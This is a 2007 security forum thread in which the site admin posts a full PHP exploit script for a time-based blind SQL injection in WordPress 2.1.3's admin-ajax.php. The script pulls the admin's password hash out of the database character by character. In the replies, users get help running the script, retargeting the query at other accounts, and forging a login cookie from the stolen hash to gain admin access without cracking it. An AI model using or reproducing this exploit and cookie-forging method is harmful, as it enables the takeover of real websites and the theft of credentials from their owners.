Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 128
Members: 0
Total: 128
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> WordPress 2.1.3 sql injection blind fishing exploit Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
WordPress 2.1.3 sql injection blind fishing exploit
PostPosted: Mon May 21, 2007 12:05 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




For using this exploit you need:

1. working php installation
2. run this script as php CLI
3. modify needed parameters in script beginning

Code:

<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...\n";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}

echo "\nFinal result: $field=$out\n\n";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min\n";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...\n");
}
else
{
echo "trying again - try $try ...\n";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>


Enjoy Smile


Last edited by waraxe on Tue May 22, 2007 2:35 am; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon May 21, 2007 12:24 pm Reply with quote
Sm0ke
Moderator
Moderator
Joined: Nov 25, 2006
Posts: 141
Location: Finland




exelent work again Very Happy
View user's profile Send private message
:)
PostPosted: Mon May 21, 2007 11:48 pm Reply with quote
oxygenne
Advanced user
Advanced user
Joined: Apr 13, 2005
Posts: 52




Are the hashes salted??
View user's profile Send private message
Re: :)
PostPosted: Tue May 22, 2007 12:23 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




oxygenne wrote:
Are the hashes salted??


Nop, they are good old plain md5 hashes Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 22, 2007 12:32 am Reply with quote
bean703
Regular user
Regular user
Joined: Mar 21, 2007
Posts: 22




It's not working I keep getting this:
Quote:
PHP Fatal error: Call to undefined function curl_init() in C:\curl\test.php on
line 240
View user's profile Send private message
PostPosted: Tue May 22, 2007 1:57 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




bean703 wrote:
It's not working I keep getting this:
Quote:
PHP Fatal error: Call to undefined function curl_init() in C:\curl\test.php on
line 240


CURL extension must be loaded. Look at php.ini:

Code:

extension=php_curl.dll


And extensions directory must be defined correctly.
Example:

Code:

; Directory in which the loadable extensions (modules) reside.
extension_dir = "./ext/"
View user's profile Send private message Send e-mail Visit poster's website
What about username they are not all "admin" :) ?
PostPosted: Tue May 22, 2007 3:38 am Reply with quote
_-GORO-_
Beginner
Beginner
Joined: May 22, 2007
Posts: 3




Nice work!

What about username they are not all "admin" Smile ?

UNION ALL SELECT 1,2,user_name.... ?????
View user's profile Send private message
Re: What about username they are not all "admin" :
PostPosted: Tue May 22, 2007 9:40 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




_-GORO-_ wrote:
Nice work!

What about username they are not all "admin" Smile ?

UNION ALL SELECT 1,2,user_name.... ?????


One way is to find out ID, which belongs to needed target user.
Another way is to modify attack query.

Orig:

Code:
WHERE ID=%d AND IF


New:

Code:
WHERE display_name=%2527waraxe25%27 AND IF
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 22, 2007 11:01 am Reply with quote
spec
Beginner
Beginner
Joined: May 22, 2007
Posts: 4




"your session has expired" "incorrect password" is killing me whenever i edit the cookie to gain access, anyway around this?

excellent work
View user's profile Send private message
PostPosted: Tue May 22, 2007 11:33 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




spec wrote:
"your session has expired" "incorrect password" is killing me whenever i edit the cookie to gain access, anyway around this?

excellent work


Do you know, that in cookie must be double-hashed password?

I mean:

md5(md5($password))
View user's profile Send private message Send e-mail Visit poster's website
Re: What about username they are not all "admin" :
PostPosted: Tue May 22, 2007 11:36 am Reply with quote
_-GORO-_
Beginner
Beginner
Joined: May 22, 2007
Posts: 3




waraxe wrote:
_-GORO-_ wrote:
Nice work!

What about username they are not all "admin" Smile ?

UNION ALL SELECT 1,2,user_name.... ?????


One way is to find out ID, which belongs to needed target user.
Another way is to modify attack query.

Orig:

Code:
WHERE ID=%d AND IF


New:

Code:
WHERE display_name=%2527waraxe25%27 AND IF


Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. Smile
View user's profile Send private message
Re: What about username they are not all "admin" :
PostPosted: Tue May 22, 2007 11:45 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I got it Very Happy

This needs some modifications to exploit. If you are interested, then I can make improved exploit with this additional functionality Smile


_-GORO-_ wrote:
waraxe wrote:
_-GORO-_ wrote:
Nice work!

What about username they are not all "admin" Smile ?

UNION ALL SELECT 1,2,user_name.... ?????


One way is to find out ID, which belongs to needed target user.
Another way is to modify attack query.

Orig:

Code:
WHERE ID=%d AND IF


New:

Code:
WHERE display_name=%2527waraxe25%27 AND IF


Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 22, 2007 11:50 am Reply with quote
spec
Beginner
Beginner
Joined: May 22, 2007
Posts: 4




waraxe , i read something about that but that not what my wordpress gave me in my cookie whenever i log in, it just has these two lines

Code:
www. myblog .com FALSE /path/ FALSE 1211319735 wordpressuser_f7f9ab0e578f2388f870c9b6a88f2999 admin
www. myblog .com FALSE /path/ FALSE 1211319735 wordpresspass_f7f9ab0e578f2388f870c9b6a88f2999 665e0b331c6dc4c6d747035199349fee


ignore the spaces between the www,, and path because wp resides in a path but how can double the md5 hashes?
View user's profile Send private message
PostPosted: Tue May 22, 2007 12:02 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Is this the situation:

you want to get admin access to some target and don't have admin's password. But you got admin password md5 hash from database?
And you want manually edit cookies, so you can gain admin access without need for md5 hash cracking?
If so, then just get that md5 hash, you allready have and hash it one more time. And resulting hash (or must I say "double-hash"?) put in cookie, you are editing.

By the way:

http://codex.wordpress.org/WordPress_Cookies

Quote:

When you log into WordPress from http://example.com/wp-login.php, WordPress stores the following two cookies:

Your user name
A double-hashed copy of your password



spec wrote:
waraxe , i read something about that but that not what my wordpress gave me in my cookie whenever i log in, it just has these two lines

Code:
www. myblog .com FALSE /path/ FALSE 1211319735 wordpressuser_f7f9ab0e578f2388f870c9b6a88f2999 admin
www. myblog .com FALSE /path/ FALSE 1211319735 wordpresspass_f7f9ab0e578f2388f870c9b6a88f2999 665e0b331c6dc4c6d747035199349fee


ignore the spaces between the www,, and path because wp resides in a path but how can double the md5 hashes?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 22, 2007 12:06 pm Reply with quote
spec
Beginner
Beginner
Joined: May 22, 2007
Posts: 4




you're right waraxe, thanks Smile
View user's profile Send private message
WordPress 2.1.3 sql injection blind fishing exploit
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.037 Seconds